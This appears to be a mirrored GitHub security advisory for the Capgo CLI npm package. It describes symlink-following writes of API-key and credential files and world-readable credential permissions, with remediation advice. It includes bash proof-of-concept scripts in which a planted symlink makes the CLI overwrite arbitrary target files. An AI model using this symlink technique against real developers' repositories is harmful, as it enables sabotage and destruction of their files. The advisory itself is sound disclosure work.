GHSA-8MPM-Q7MH-8FVH

Vulnerability from github – Published: 2026-03-18 16:09 – Updated: 2026-03-18 16:09
VLAI
Summary
Capgo CLI: symlink-following local secret writes enable arbitrary file overwrite + world-readable credentials (0600 missing)
Details

Summary

The Capgo CLI writes sensitive local files (.capgo API key file and build credentials JSON) using unsafe file operations that follow symlinks and do not enforce safe permissions. This allows an attacker-controlled repository to cause arbitrary file overwrite on the developer’s machine when the developer runs the CLI inside that repo. Additionally, global build credentials are written with world-readable permissions (664), exposing signing materials on shared systems.

Details

Issue 1 - Arbitrary file overwrite via .capgo symlink (login --local)

  • Location: src/login.ts
  • Behavior: loginInternal(..., { local: true }) performs writeFileSync('.capgo', ...) before validating the API key with verifyUser().
  • No checks are performed to prevent writing through a symlink.
  • Result: if .capgo is a symlink to an arbitrary path, the CLI overwrites the symlink target with attacker-controlled content (the provided API key string), even when login fails.

Issue 2 - Arbitrary file overwrite via .capgo-credentials.json symlink (build credentials save --local)

  • Location: src/build/credentials.ts (local path is join(cwd(), '.capgo-credentials.json'))
  • Behavior: credentials are written using writeFile() without checking whether the destination is a symlink.
  • Result: if .capgo-credentials.json is a symlink to an arbitrary path, the CLI overwrites the symlink target with attacker-controlled JSON (including base64-encoded credential material). This occurs even if the user is not logged in / no API key exists.

Issue 3 - Insecure default permissions for global credentials

  • Location: src/build/credentials.ts (global path $HOME/.capgo-credentials/credentials.json)
  • Observed permissions after save: -rw-rw-r-- (664)
  • Impact: credentials file contains sensitive signing material (e.g., Android keystore + Play config; iOS cert/profile/API key in other flows). World/group readability is unsafe on shared hosts and CI runners. Expected minimum: file 0600, directory 0700.

PoC

PoC A: .capgo symlink clobber (writes even when API key invalid)

set -euo pipefail
BASE="/tmp/capgo_cli_poc_$(date +%s)"
HOME_SANDBOX="$BASE/home"
REPO="$BASE/repo"
TARGET="$BASE/clobbered.txt"

mkdir -p "$HOME_SANDBOX" "$REPO"
cd "$REPO"
git init -q

ln -s "$TARGET" .capgo

# This should fail auth, but still overwrites TARGET
HOME="$HOME_SANDBOX" npx --yes @capgo/cli@7.82.0 login "INVALID_KEY_SHOULD_FAIL" --local || true

echo "== TARGET content =="
cat "$TARGET"

Expected: On invalid key, nothing is written; .capgo should never follow symlinks. Observed: TARGET contains INVALID_KEY_SHOULD_FAIL.

PoC B: .capgo-credentials.json symlink clobber (no login required)

set -euo pipefail
BASE="/tmp/capgo_creds_symlink_$(date +%s)"
HOME_SANDBOX="$BASE/home"
REPO="$BASE/repo"
TARGET="$BASE/clobbered_creds.txt"

mkdir -p "$HOME_SANDBOX" "$REPO"
cd "$REPO"
git init -q

ln -s "$TARGET" .capgo-credentials.json

HOME="$HOME_SANDBOX" npx --yes @capgo/cli@7.82.0 build credentials save \
  --local --platform android --appId com.example.app \
  --keystore /etc/hosts --keystore-alias x --keystore-key-password x --play-config /etc/hosts || true

echo "== TARGET exists and contains JSON written via symlink =="
ls -la "$TARGET" || true
cat "$TARGET" || true

Expected: Refuse to write if destination is symlink; ideally require safe location and permissions. Observed: TARGET is created/overwritten with credentials JSON.

PoC C: global credentials permissions are world-readable

set -euo pipefail
BASE="/tmp/capgo_creds_perm_$(date +%s)"
HOME_SANDBOX="$BASE/home"
mkdir -p "$HOME_SANDBOX"

HOME="$HOME_SANDBOX" npx --yes @capgo/cli@7.82.0 build credentials save \
  --platform android --appId com.example.app \
  --keystore /etc/hosts --keystore-alias x --keystore-key-password x --play-config /etc/hosts || true

CREDS="$HOME_SANDBOX/.capgo-credentials/credentials.json"
ls -la "$CREDS" || true
stat -c '%a %U:%G %n' "$CREDS" || true

Observed: credentials.json created with mode 664 (-rw-rw-r--).

Impact

  • Arbitrary file overwrite (clobber) as the user running the CLI (developer workstation / CI runner).
  • This can cause:

developer environment compromise or sabotage (overwriting config files, scripts, env files) accidental or malicious leakage/destruction of secrets

  • Local secret exposure: global credentials written as 664 allows other local users to read signing material on shared machines.
  • A realistic scenario: a developer runs npx @capgo/cli ... --local inside an untrusted repo/template; the repo contains malicious symlinks.

Suggested remediation

  • Do not write .capgo until after API key validation succeeds.
  • For all secret/config writes:

refuse symlink destinations (lstat + isSymbolicLink) use safe file creation and enforce permissions (0600 for files; 0700 for directories) write atomically (temp file + rename) after safety checks

  • Avoid blindly appending to .gitignore unless it is a regular file (also check for symlink).
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@capgo/cli"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "7.84.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-276",
      "CWE-377",
      "CWE-59"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-18T16:09:42Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\nThe Capgo CLI writes sensitive local files (.capgo API key file and build credentials JSON) using unsafe file operations that follow symlinks and do not enforce safe permissions. This allows an attacker-controlled repository to cause arbitrary file overwrite on the developer\u2019s machine when the developer runs the CLI inside that repo. Additionally, global build credentials are written with world-readable permissions (664), exposing signing materials on shared systems.\n\n### Details\nIssue 1 - Arbitrary file overwrite via .capgo symlink (login --local)\n\n- Location: src/login.ts\n- Behavior: loginInternal(..., { local: true }) performs writeFileSync(\u0027.capgo\u0027, ...) before validating the API key with verifyUser().\n- No checks are performed to prevent writing through a symlink.\n- Result: if .capgo is a symlink to an arbitrary path, the CLI overwrites the symlink target with attacker-controlled content (the provided API key string), even when login fails.\n\nIssue 2 - Arbitrary file overwrite via .capgo-credentials.json symlink (build credentials save --local)\n\n- Location: src/build/credentials.ts (local path is join(cwd(), \u0027.capgo-credentials.json\u0027))\n- Behavior: credentials are written using writeFile() without checking whether the destination is a symlink.\n- Result: if .capgo-credentials.json is a symlink to an arbitrary path, the CLI overwrites the symlink target with attacker-controlled JSON (including base64-encoded credential material). This occurs even if the user is not logged in / no API key exists.\n\nIssue 3 - Insecure default permissions for global credentials\n\n- Location: src/build/credentials.ts (global path $HOME/.capgo-credentials/credentials.json)\n- Observed permissions after save: -rw-rw-r-- (664)\n- Impact: credentials file contains sensitive signing material (e.g., Android keystore + Play config; iOS cert/profile/API key in other flows). World/group readability is unsafe on shared hosts and CI runners. Expected minimum: file 0600, directory 0700.\n\n### PoC\nPoC A: .capgo symlink clobber (writes even when API key invalid)\n```\nset -euo pipefail\nBASE=\"/tmp/capgo_cli_poc_$(date +%s)\"\nHOME_SANDBOX=\"$BASE/home\"\nREPO=\"$BASE/repo\"\nTARGET=\"$BASE/clobbered.txt\"\n\nmkdir -p \"$HOME_SANDBOX\" \"$REPO\"\ncd \"$REPO\"\ngit init -q\n\nln -s \"$TARGET\" .capgo\n\n# This should fail auth, but still overwrites TARGET\nHOME=\"$HOME_SANDBOX\" npx --yes @capgo/cli@7.82.0 login \"INVALID_KEY_SHOULD_FAIL\" --local || true\n\necho \"== TARGET content ==\"\ncat \"$TARGET\"\n```\n_Expected: On invalid key, nothing is written; .capgo should never follow symlinks.\nObserved: TARGET contains INVALID_KEY_SHOULD_FAIL._\n\nPoC B: .capgo-credentials.json symlink clobber (no login required)\n```\nset -euo pipefail\nBASE=\"/tmp/capgo_creds_symlink_$(date +%s)\"\nHOME_SANDBOX=\"$BASE/home\"\nREPO=\"$BASE/repo\"\nTARGET=\"$BASE/clobbered_creds.txt\"\n\nmkdir -p \"$HOME_SANDBOX\" \"$REPO\"\ncd \"$REPO\"\ngit init -q\n\nln -s \"$TARGET\" .capgo-credentials.json\n\nHOME=\"$HOME_SANDBOX\" npx --yes @capgo/cli@7.82.0 build credentials save \\\n  --local --platform android --appId com.example.app \\\n  --keystore /etc/hosts --keystore-alias x --keystore-key-password x --play-config /etc/hosts || true\n\necho \"== TARGET exists and contains JSON written via symlink ==\"\nls -la \"$TARGET\" || true\ncat \"$TARGET\" || true\n```\n_Expected: Refuse to write if destination is symlink; ideally require safe location and permissions.\nObserved: TARGET is created/overwritten with credentials JSON._\n\nPoC C: global credentials permissions are world-readable\n```\nset -euo pipefail\nBASE=\"/tmp/capgo_creds_perm_$(date +%s)\"\nHOME_SANDBOX=\"$BASE/home\"\nmkdir -p \"$HOME_SANDBOX\"\n\nHOME=\"$HOME_SANDBOX\" npx --yes @capgo/cli@7.82.0 build credentials save \\\n  --platform android --appId com.example.app \\\n  --keystore /etc/hosts --keystore-alias x --keystore-key-password x --play-config /etc/hosts || true\n\nCREDS=\"$HOME_SANDBOX/.capgo-credentials/credentials.json\"\nls -la \"$CREDS\" || true\nstat -c \u0027%a %U:%G %n\u0027 \"$CREDS\" || true\n```\n_Observed: credentials.json created with mode 664 (-rw-rw-r--)._\n\n### Impact\n\n- Arbitrary file overwrite (clobber) as the user running the CLI (developer workstation / CI runner).\n- This can cause:\n\n\u003edeveloper environment compromise or sabotage (overwriting config files, scripts, env files)\n\u003eaccidental or malicious leakage/destruction of secrets\n\n- Local secret exposure: global credentials written as 664 allows other local users to read signing material on shared machines.\n- A realistic scenario: a developer runs npx @capgo/cli ... --local inside an untrusted repo/template; the repo contains malicious symlinks.\n\n### Suggested remediation\n\n- Do not write .capgo until after API key validation succeeds.\n- For all secret/config writes:\n\n\u003erefuse symlink destinations (lstat + isSymbolicLink)\n\u003euse safe file creation and enforce permissions (0600 for files; 0700 for directories)\n\u003ewrite atomically (temp file + rename) after safety checks\n\n- Avoid blindly appending to .gitignore unless it is a regular file (also check for symlink).",
  "id": "GHSA-8mpm-q7mh-8fvh",
  "modified": "2026-03-18T16:09:42Z",
  "published": "2026-03-18T16:09:42Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/Cap-go/capgo/security/advisories/GHSA-8mpm-q7mh-8fvh"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Cap-go/CLI/commit/b8aa5ccbfad2d7f10f3cdbc00910d4a6aab026b2"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/Cap-go/capgo"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Capgo CLI: symlink-following local secret writes enable arbitrary file overwrite + world-readable credentials (0600 missing)"
}



Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…